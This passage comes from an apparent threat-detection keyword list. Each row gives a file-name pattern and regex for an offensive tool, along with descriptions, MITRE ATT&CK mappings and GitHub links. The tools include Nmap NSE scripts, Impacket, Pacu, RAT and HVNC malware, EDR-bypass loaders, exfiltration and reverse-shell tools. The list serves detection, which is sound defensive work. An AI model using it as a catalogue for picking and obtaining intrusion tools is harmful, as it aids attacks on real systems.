Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2015-1427.nse*",".{0,1000}\/http\-vuln\-cve2015\-1427\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2015-1635.nse*",".{0,1000}\/http\-vuln\-cve2015\-1635\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2017-1001000.nse*",".{0,1000}\/http\-vuln\-cve2017\-1001000\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2017-5638.nse*",".{0,1000}\/http\-vuln\-cve2017\-5638\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2017-5689.nse*",".{0,1000}\/http\-vuln\-cve2017\-5689\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2017-8917.nse*",".{0,1000}\/http\-vuln\-cve2017\-8917\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vulners-regex.nse*",".{0,1000}\/http\-vulners\-regex\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/vulnersCom/nmap-vulners","1","1","N/A","N/A","10","3124","534","2024-04-03T11:53:29Z","2017-12-19T21:21:28Z" "*/http-vuln-misfortune-cookie.nse*",".{0,1000}\/http\-vuln\-misfortune\-cookie\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-wnr1000-creds.nse*",".{0,1000}\/http\-vuln\-wnr1000\-creds\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-waf-detect.nse*",".{0,1000}\/http\-waf\-detect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-waf-fingerprint.nse*",".{0,1000}\/http\-waf\-fingerprint\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-webdav-scan.nse*",".{0,1000}\/http\-webdav\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-wordpress-brute.nse*",".{0,1000}\/http\-wordpress\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-wordpress-enum.nse*",".{0,1000}\/http\-wordpress\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-wordpress-users.nse*",".{0,1000}\/http\-wordpress\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-xssed.nse*",".{0,1000}\/http\-xssed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/huan.exe *",".{0,1000}\/huan\.exe\s.{0,1000}","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","0","N/A","N/A","6","525","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" "*/HuanLoader/*",".{0,1000}\/HuanLoader\/.{0,1000}","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. 
it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","1","N/A","N/A","6","525","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" "*/HVNC.git*",".{0,1000}\/HVNC\.git.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","1","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*/HVNC-Server.exe*",".{0,1000}\/HVNC\-Server\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/HWSyscalls.cpp*",".{0,1000}\/HWSyscalls\.cpp.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","199","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*/hXOR.exe*",".{0,1000}\/hXOR\.exe.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","1","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*/hXOR-Packer.git*",".{0,1000}\/hXOR\-Packer\.git.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with 
Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","1","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*/hyperion.exe*",".{0,1000}\/hyperion\.exe.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/Hypnos.git*",".{0,1000}\/Hypnos\.git.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","1","N/A","10","1","50","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z" "*/hypobrychium.git*",".{0,1000}\/hypobrychium\.git.{0,1000}","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z" "*/iam__backdoor_users_password*",".{0,1000}\/iam__backdoor_users_password.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/iam__bruteforce_permissions/*",".{0,1000}\/iam__bruteforce_permissions\/.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation 
framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/iam__privesc_scan*",".{0,1000}\/iam__privesc_scan.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/iat_obfuscation.exe*",".{0,1000}\/iat_obfuscation\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/iax2-brute.nse*",".{0,1000}\/iax2\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/iax2-version.nse*",".{0,1000}\/iax2\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/icap-info.nse*",".{0,1000}\/icap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/icebreaker.git*",".{0,1000}\/icebreaker\.git.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/icebreaker.py*",".{0,1000}\/icebreaker\.py.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/icmp_exfiltration.py*",".{0,1000}\/icmp_exfiltration\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" 
"*/id_reverse-ssh.pub*",".{0,1000}\/id_reverse\-ssh\.pub.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*/IDiagnosticProfileUAC*",".{0,1000}\/IDiagnosticProfileUAC.{0,1000}","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","1","N/A","10","2","175","31","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" "*/iec-identify.nse*",".{0,1000}\/iec\-identify\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ielocalserver.dll*",".{0,1000}\/ielocalserver\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/ieshell32.dll*",".{0,1000}\/ieshell32\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/iis_controller.py*",".{0,1000}\/iis_controller\.py.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","525","123","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "*/IIS-Raid.git*",".{0,1000}\/IIS\-Raid\.git.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","525","123","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "*/ike-crack.*",".{0,1000}\/ike\-crack\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/IKEForce*",".{0,1000}\/IKEForce.{0,1000}","offensive_tool_keyword","IKEForce","IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.","T1110 - T1201 - T1018","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/SpiderLabs/ikeforce","1","0","N/A","N/A","3","231","74","2019-09-18T09:35:41Z","2014-09-12T01:11:00Z" "*/ike-version.nse*",".{0,1000}\/ike\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/imap-brute.nse*",".{0,1000}\/imap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/imap-capabilities.nse*",".{0,1000}\/imap\-capabilities\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/imap-ntlm-info.nse*",".{0,1000}\/imap\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/IMDSpoof.git*",".{0,1000}\/IMDSpoof\.git.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","1","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*/imfiver/CVE-2022-0847*",".{0,1000}\/imfiver\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/imfiver/CVE-2022-0847","1","1","N/A","N/A","3","270","77","2023-02-02T02:17:30Z","2022-03-07T18:36:50Z" "*/impacket.*",".{0,1000}\/impacket\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/impacket.zip*",".{0,1000}\/impacket\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*/impacket/*",".{0,1000}\/impacket\/.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/Impersonate.exe*",".{0,1000}\/Impersonate\.exe.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","1","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*/impersonate.git*",".{0,1000}\/impersonate\.git.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","1","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*/impersonate.py*",".{0,1000}\/impersonate\.py.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","1","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*/impersonate.py*",".{0,1000}\/impersonate\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" 
"*/Impersonate/Impersonate.cpp*",".{0,1000}\/Impersonate\/Impersonate\.cpp.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","1","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*/impersonate-rs*",".{0,1000}\/impersonate\-rs.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","1","N/A","N/A","1","88","6","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" "*/imperun * *cmd.exe /c whoami*",".{0,1000}\/imperun\s.{0,1000}\s.{0,1000}cmd\.exe\s\/c\swhoami.{0,1000}","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","117","14","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" "*/Imperva_gzip_WAF_Bypass*",".{0,1000}\/Imperva_gzip_WAF_Bypass.{0,1000}","offensive_tool_keyword","Imperva_gzip_WAF_Bypass","Imperva Cloud WAF was vulnerable to a bypass that allows attackers to evade WAF rules when sending malicious HTTP POST payloads. such as log4j exploits. SQL injection. command execution. directory traversal. XXE. 
